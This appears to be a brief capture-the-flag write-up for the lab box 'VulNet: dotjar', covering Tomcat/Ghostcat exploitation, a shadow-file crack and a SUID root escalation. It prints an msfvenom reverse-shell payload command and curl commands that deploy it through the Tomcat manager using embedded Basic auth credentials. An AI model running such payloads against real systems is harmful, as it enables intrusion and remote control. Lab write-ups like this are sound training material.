VulNet: dotjar

Scanning the box and Initial recon

Result of the aggressive port scanning

Exploiting the vulnerability

Credentials and exploits from the Ghostcat exploit

Gaining shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your tun0 IP> LPORT=4444 -f war -o reverse.war
curl --upload-file reverse.war --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" "http://10.10.23.194:8080/manager/text/deploy?path=/reverse"
curl --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" http://10.10.23.194:8080/manager/text/list

Horizontal Privilege Escalation and User flag

Spawning the initial shell on the target
Hidden backup found by LinPEAS
Leaked backup of /etc/shadow file
Recovering the password using hashcat
Horizontal escalation to the jdk-admin user

Gaining root access using Java

Root reverse shell

Changing shell’s permission

Running the SUID exploit code and checking whether it ran successfully
Running the SUID enabled bash executable to elevate permissions to root
